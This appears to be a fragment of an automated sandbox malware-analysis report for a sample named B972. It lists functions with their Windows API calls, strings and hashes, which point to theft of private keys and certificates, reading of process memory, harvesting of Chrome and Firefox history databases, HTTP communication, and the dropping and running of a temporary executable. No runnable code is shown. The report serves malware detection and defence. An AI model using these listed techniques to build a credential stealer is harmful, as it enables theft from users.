                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D633DC
                                                                                                                                        • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D63404
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D6341C
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D6343F
                                                                                                                                        • CryptAcquireContextA.ADVAPI32 ref: 00007FF6F2D63459
                                                                                                                                        • CryptImportKey.ADVAPI32 ref: 00007FF6F2D6347E
                                                                                                                                        • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D634B5
                                                                                                                                        • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63505
                                                                                                                                        • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63523
                                                                                                                                        • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63532
                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6355D
                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6357C
                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D6359F
                                                                                                                                        • NCryptExportKey.NCRYPT ref: 00007FF6F2D63605
                                                                                                                                        • CertOpenStore.CRYPT32 ref: 00007FF6F2D63667
                                                                                                                                        • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF6F2D63682
                                                                                                                                        • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF6F2D6369E
                                                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6F2D636BD
                                                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6F2D636DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                                                        • String ID: -,0z$5)F$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$km{l
                                                                                                                                        • API String ID: 2161712720-385819238
                                                                                                                                        • Opcode ID: 75218921cc3421a315647877bddf5402e5b1d27b10d9dd8a73d73ab1dfe14f5f
                                                                                                                                        • Instruction ID: 62cf4739a402021a93f3d2527685dcead2264968623111f8cdcaf39cc5cb74b7
                                                                                                                                        • Opcode Fuzzy Hash: 75218921cc3421a315647877bddf5402e5b1d27b10d9dd8a73d73ab1dfe14f5f
                                                                                                                                        • Instruction Fuzzy Hash: 63E15A32B14A818AE710CFA1E844BED77A5BB49B88F404236DE5D57A98EF7CD109CB50
                                                                                                                                        Function 00007FF6F2D6213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                                                                        • String ID: <r;r$?r r$?r r
                                                                                                                                        • API String ID: 199669925-2032818692
                                                                                                                                        • Opcode ID: 7c3200e5b1162a59e3336203ad07deaebe161b4bdf8a21f308cab0b868f4c084
                                                                                                                                        • Instruction ID: 310016c18ab9c5ffe4e837228c4c246b8e3fe6f63d8ab942ee1ba908742513f0
                                                                                                                                        • Opcode Fuzzy Hash: 7c3200e5b1162a59e3336203ad07deaebe161b4bdf8a21f308cab0b868f4c084
                                                                                                                                        • Instruction Fuzzy Hash: F3A1E872B1838186EB10CF6594941AD7BA1FB86B88F444235DE5D87B89EF7CD405CF10
                                                                                                                                        Function 00007FF6F2D6FB38 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65stringfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                                                                        • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                                                                        • API String ID: 4154822446-3438982840
                                                                                                                                        • Opcode ID: d7269cf17e5b33c1795cd74e29e03c46c3fcc247abef41597c81738ae3b3c5ab
                                                                                                                                        • Instruction ID: 3fb4ef33b0f2e82d79eda58720bdc252f4a9fc38fcf9d535ec213eb16858e0c9
                                                                                                                                        • Opcode Fuzzy Hash: d7269cf17e5b33c1795cd74e29e03c46c3fcc247abef41597c81738ae3b3c5ab
                                                                                                                                        • Instruction Fuzzy Hash: 00315322A1894795EB10DF10E8945E97325FB44798F805231D96E8B9D8FFACD609CB50
                                                                                                                                        Function 00007FF6F2D6B428 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                                                                        • String ID: "_": ""$%02X
                                                                                                                                        • API String ID: 2879528921-1880646522
                                                                                                                                        • Opcode ID: e59ca80a278d3f8b3b4db8a184319e5bea95b8baa96d61451950577b7007fd03
                                                                                                                                        • Instruction ID: 7de73543c9ff4e898ce3bb1b1bcc7e8621594d86b5c387c759380c0851cd5752
                                                                                                                                        • Opcode Fuzzy Hash: e59ca80a278d3f8b3b4db8a184319e5bea95b8baa96d61451950577b7007fd03
                                                                                                                                        • Instruction Fuzzy Hash: EED15022B0960344EB14EB6198912FD37699F567CCB486632DD3ED77C6FEACE1058B20
                                                                                                                                        Function 00007FF6F2D636F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptExport$HeapProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 532797600-0
                                                                                                                                        • Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                                        • Instruction ID: a6dbf3f7e783ee36f01836b724e11a213a775ff5256ad06c22965872e5273c1e
                                                                                                                                        • Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                                                                                        • Instruction Fuzzy Hash: F1213D32A19A4292EB90CF15F49076977A1BB85B98F109330EA6D876D4EF7CD5058F10
                                                                                                                                        Function 00007FF6F2D6FF3C Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2161876737-0
                                                                                                                                        • Opcode ID: 063b78b404f5c96bf7d67d942382568fb73c345fad3f326a6c542ad15abcefa6
                                                                                                                                        • Instruction ID: cd53b869c55d1b7449d293068ed617fbb55b5fc3ddb85dc4e14e778550237cde
                                                                                                                                        • Opcode Fuzzy Hash: 063b78b404f5c96bf7d67d942382568fb73c345fad3f326a6c542ad15abcefa6
                                                                                                                                        • Instruction Fuzzy Hash: 4B31B321A08A4282EB24DB22A8597797395BB89BE5F144334DD7D87BE4EF7CD4058B10
                                                                                                                                        Function 00007FF6F2D61CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                                                                        • String ID: %08X.exe$open
                                                                                                                                        • API String ID: 2307396689-1771423410
                                                                                                                                        • Opcode ID: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                                                        • Instruction ID: a414c3c6dd664a84c91278e5fff6396b1bdf730ef587cdb4418fad9fcc1efc12
                                                                                                                                        • Opcode Fuzzy Hash: 8de0e536810cab89fbb532c5864f35491e90b95316bd22bc7e796462d49f8046
                                                                                                                                        • Instruction Fuzzy Hash: 4931A77261898596E720CF20E8887E97325FB8978CF404235DA5D8AA98EF7CC60DCB10
                                                                                                                                        Function 00007FF6F2D6F988 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                                                                        • String ID: Default$LOCALAPPDATA$\History
                                                                                                                                        • API String ID: 3980575106-3555721359
                                                                                                                                        • Opcode ID: a9490f531bca9e2a9df176b31feed2a3c8fdbf660a9032f732405aecd540a554
                                                                                                                                        • Instruction ID: 4cf45b9ce1a3bab782ec0a42e82bd4b9a47f8f1340cc49ece934f0ddc37e1959
                                                                                                                                        • Opcode Fuzzy Hash: a9490f531bca9e2a9df176b31feed2a3c8fdbf660a9032f732405aecd540a554
                                                                                                                                        • Instruction Fuzzy Hash: 77516322E18F8582E750DF24D9412A87770FB99788F45A321DE9D53666FF78E6C8C700
                                                                                                                                        Function 00007FF6F2D6FC70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                        • String ID: http
                                                                                                                                        • API String ID: 948891078-2541227442
                                                                                                                                        • Opcode ID: da779b66130cb05ef608860a343e0f9fb267a85ae6c6f153e63f2b0c7d92370d
                                                                                                                                        • Instruction ID: 17e371f65e35ef077dfb50ce3ce7a3f35b9562b434763bd01c6b7579873fe7d2
                                                                                                                                        • Opcode Fuzzy Hash: da779b66130cb05ef608860a343e0f9fb267a85ae6c6f153e63f2b0c7d92370d
                                                                                                                                        • Instruction Fuzzy Hash: 52416232608A4699E7109F65D4953A937A1FB85B8CF044236DA5E8BAE8EF7CD148CB10
                                                                                                                                        Function 00007FF6F2D69478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81timesynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                                                        • String ID: exit
                                                                                                                                        • API String ID: 1626563136-1626635026
                                                                                                                                        • Opcode ID: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                                                        • Instruction ID: f88c66be1f4166232ef29a87bcbb3d9bc70e0528e35b3ef42b43f1636e1d9394
                                                                                                                                        • Opcode Fuzzy Hash: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                                                        • Instruction Fuzzy Hash: 76312E31A0864281EF50DF35D4902B93BA1EF95B8CF541332E92EC65D9FEACE845CB60
                                                                                                                                        Function 00007FF6F2D61EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1750269033-0
                                                                                                                                        • Opcode ID: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                                        • Instruction ID: ab7fcc01f1f293ebbd49ca2ce118f9e05da8bc1e4a2eacdafa0d4aba0a8a13f5
                                                                                                                                        • Opcode Fuzzy Hash: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                                        • Instruction Fuzzy Hash: 11613926B08A0696EB00DF65D4943AC37A4FB49B8CF448232CE1D97B98EE7DD509C760
                                                                                                                                        Function 00007FF6F2D6F108 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                        • __memcpy.DELAYIMP ref: 00007FF6F2D6F18F
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70145
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70153
                                                                                                                                          • Part of subcall function 00007FF6F2D6EB94: lstrlenA.KERNEL32 ref: 00007FF6F2D6EBB1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                                                        • API String ID: 2336645791-3896411411
                                                                                                                                        • Opcode ID: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                                        • Instruction ID: f6ebf14a7c896fbe09eef22c620d048c1911f4872c2a29dcf85c07fba0a7df20
                                                                                                                                        • Opcode Fuzzy Hash: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                                        • Instruction Fuzzy Hash: 9A319862608B8686DB20DB26E4905A97B50FB86BC8F408231DE6EC77D5FEBCD545CF10
                                                                                                                                        Function 00007FF6F2D6EEDC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                        • __memcpy.DELAYIMP ref: 00007FF6F2D6EF63
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70145
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70153
                                                                                                                                          • Part of subcall function 00007FF6F2D6EB94: lstrlenA.KERNEL32 ref: 00007FF6F2D6EBB1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                        • String ID: last_visit_date$moz_places$table$url
                                                                                                                                        • API String ID: 2336645791-66087218
                                                                                                                                        • Opcode ID: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                                        • Instruction ID: 726d15e15da1afc21c4cf6b2f85e19db96d215b575fdd5027171060912a61d5f
                                                                                                                                        • Opcode Fuzzy Hash: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                                        • Instruction Fuzzy Hash: 6931A922608A8745DB20DB26E4906A97B50FB86BC8F504232DE6EC77D5FEBCD446CB10
                                                                                                                                        Function 00007FF6F2D6ECBC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                        • __memcpy.DELAYIMP ref: 00007FF6F2D6ED43
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70145
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70153
                                                                                                                                          • Part of subcall function 00007FF6F2D6EB94: lstrlenA.KERNEL32 ref: 00007FF6F2D6EBB1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                                                        • API String ID: 2336645791-3896411411
